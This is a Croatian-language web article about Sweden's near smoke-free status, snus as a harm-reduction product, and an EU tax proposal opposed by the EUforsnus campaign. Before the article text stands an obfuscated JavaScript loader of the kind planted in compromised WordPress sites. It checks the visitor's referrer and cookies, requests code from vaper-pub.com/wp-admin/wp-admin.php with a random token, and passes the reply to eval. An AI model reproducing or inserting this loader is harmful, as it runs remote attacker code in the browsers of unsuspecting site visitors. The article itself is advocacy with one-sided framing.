;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Status Švedske bez dima i uspješne strategije koje su ga postigle

Tablica koju je EU objavila u svibnju 2017. kao dio istraživanja o ponašanju pušača u Uniji, navodi Bugarsku, Grčku i Francusku kao zemlje EU-a s najvišim stopama pušenja. Dok su na dnu ovog popisa bile Nizozemska, Danska i Ujedinjeno Kraljevstvo, sve sa 16%, i konačno, Švedska, sa impresivnih 5%, postotak koji se globalno smatra izjednačavajućim s “bez dima”.

Švedska je poznata po tome što je ovaj status dosegla zahvaljujući usvajanju strategije smanjenja štete od duhana. To je učinjeno podržavanjem korištenja sigurnijih nikotinskih alternativa za prestanak pušenja, od kojih je najčešće korišten snus. Snus je vlažni duhanski proizvod u prahu koji se dulje vrijeme stavlja ispod gornje usne.

Naknadno je novije izvješće istaknulo da će u nadolazećim mjesecima stopa pušenja pasti ispod 5% i detaljno opisuje pristup koji je doveo do ovog uspjeha. Anders Milton, jedan od autora izvješća, istaknuo je da bi situacija u Europi izgledala drugačije kada bi druge zemlje EU kopirale švedsku strategiju.

“Prestanak pušenja poput Švedske spašava živote”, rekao je Milton. “Godišnje je spasio više od 3400 života u Švedskoj. Kada bi sve ostale zemlje EU-a učinile kao Švedska, 3,5 milijuna života moglo bi se spasiti u narednom desetljeću samo u EU-u.”

Nerazuman porezni prijedlog

U međuvremenu, nedavni porezni prijedlog EU-a bi povećao minimalnu trošarinu Unije na cigarete sa 1,80 € na 3,60 € po kutiji od 20 cigareta, a porez se također predlaže za sigurnije alternative kao što su e-cigarete. Nažalost, dokumenti koji su procurili pokazuju da je plan prisiliti Švedsku da uvede porez na snus na nerazumnoj razini, unatoč očitom uspjehu koji ima.

U priopćenju za javnost prošlog tjedna, osnivač pokreta EUforsnus (@EU4snus na Twitteru) Bengt Wiberg objasnio je da će grupa sada početi koristiti hashtagove #VetoEUsnusmurder, #EUsnusmurder& #StopEUsnusmurder, te stupa u kontakt sa subjektima za smanjenje štete kako bi skrenula pozornost na njih.

Choose your Reaction!
Leave a Comment